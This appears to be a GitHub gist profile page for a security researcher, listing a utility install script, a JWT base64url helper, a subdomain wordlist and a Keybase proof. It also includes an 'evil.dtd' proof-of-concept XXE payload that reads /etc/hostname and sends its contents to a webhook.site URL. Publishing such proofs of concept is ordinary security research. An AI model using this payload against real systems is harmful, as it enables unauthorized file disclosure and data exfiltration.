Skip to content

Instantly share code, notes, and snippets.

View ap00rv's full-sized avatar
🔒
all things security

Apoorv Munshi ap00rv

🔒
all things security
View GitHub Profile
@ap00rv
ap00rv / evil.dtd
Last active May 8, 2026 20:41
DS-6 PoC XXE payload
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % combined "<!ENTITY &#x25; send SYSTEM 'https://webhook.site/2e7f6d5f-7834-4900-b557-c74d10c882e3?hostname=%file;'>">
%combined;
%send;
#!/bin/sh
#A quick shell script to add utilities to a new linux installation
sudo apt-get install -y vim open-vm-tools open-vm-tools-desktop tree cloc git;
@ap00rv
ap00rv / JWT_base64url_.py
Created March 20, 2018 21:51
script for base64_url encoding and decoding as per Appendix C of RFC 7515 (used in JSON Web Tokens)
#!/usr/bin/python3
#This script performs base64_url encoding/decoding (without padding) as per the algorithm mentioned in Appendix C of RFC 7515 (JSON Web Signatures)
#https://tools.ietf.org/html/rfc7515#appendix-C
import base64
import argparse
@ap00rv
ap00rv / all.txt
Created July 15, 2017 17:42 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@
*
0
00
0-0
000
0000
00000

Keybase proof

I hereby claim:

  • I am ap00rv on github.
  • I am apoorvmunshi (https://keybase.io/apoorvmunshi) on keybase.
  • I have a public key whose fingerprint is 6276 B1B9 C78C B626 F1EE A5F0 2890 29A5 A6DE C14C

To claim this, I am signing this object: